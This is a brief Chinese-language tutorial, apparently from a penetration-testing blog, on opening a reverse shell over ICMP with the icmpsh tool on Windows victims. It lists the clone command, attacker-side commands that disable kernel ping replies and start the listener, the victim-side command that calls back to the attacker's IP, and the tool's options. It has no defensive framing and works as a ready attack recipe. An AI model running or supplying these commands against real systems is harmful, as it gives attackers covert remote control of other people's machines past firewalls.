該方案受害機器僅爲Windows。

下載icmpsh:
1
git clone https://github.com/inquisb/icmpsh.sh
在攻擊機器上:
1
2
sysctl -w net.ipv4.icmp_echo_ignore_all=1
python2 icmpsh_m.py <attacker ip> <target ip>
在受害機器上:
1
icmpsh.exe -t <attacker ip> -d 500 -b 30 -s 128
參數:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
-t host            host ip address to send ping requests to. This option is mandatory!

-r send a single test icmp request containing the string "Test1234" and then quit.
This is for testing the connection.

-d milliseconds delay between requests in milliseconds

-o milliseconds timeout of responses in milliseconds. If a response has not received in time,
the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit.
The counter is set back to 0 if a response was received.

-b num limit of blanks (unanswered icmp requests before quitting

-s bytes maximal data buffer size in bytes